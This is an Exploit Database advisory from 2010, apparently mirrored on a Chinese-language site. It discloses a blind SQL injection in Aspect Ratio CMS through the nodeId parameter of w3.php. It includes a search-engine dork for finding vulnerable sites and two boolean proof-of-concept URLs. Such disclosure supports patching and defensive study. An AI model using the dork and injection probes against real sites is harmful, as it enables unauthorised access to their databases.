Aspect Ratio CMS – Blind SQL Injection

Exploit Database
95 阅读

作者： Stephan Sattler

日期： 2010-10-04
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/15205/

# Author: Stephan Sattler // http://www.solidmedia.de
# Software Website: http://www.meso.net
# Software Link: http://www.meso.net/aspekt-ratio
# Dork: inurl:w3.php?nodeId=
 
 
[ Vulnerability ]


# Explanation:

$_GET["nodeId"] isn't sanitized before executing the database query.
An attacker can use this for a blind SQL injection attack.


# Exploiting the Vulnerability // PoC:

URL: http://[site]/[path]/w3.php?nodeId=8348 and (select 1)=1 - will show the page
URL: http://[site]/[path]/w3.php?nodeId=8348 and (select 1)=0 - will show an error page by aspect ratio Cms

last Exploits
Aspect Ratio CMS – Blind SQL Injection的更多信息

WordPress Plugin post highlights 2.2 – SQL Injection：
Mobiketa 3.5 – SQL Injection：
MOVEit Transfer 11.1.1 – ‘token’ Unauthenticated SQL Injection：
Free Help Desk 1.1b – Multiple Input Validation Vulnerabilities：
CMSQLite 1.3.2 – Multiple Vulnerabilities：
MediaInSpot CMS – Local File Inclusion (1)：
Ecessa WANWorx WVR-30 < 10.7.4 - Cross-Site Request Forgery (Add Superuser)：
Joomla! Component com_doqment – ‘cid’ SQL Injection：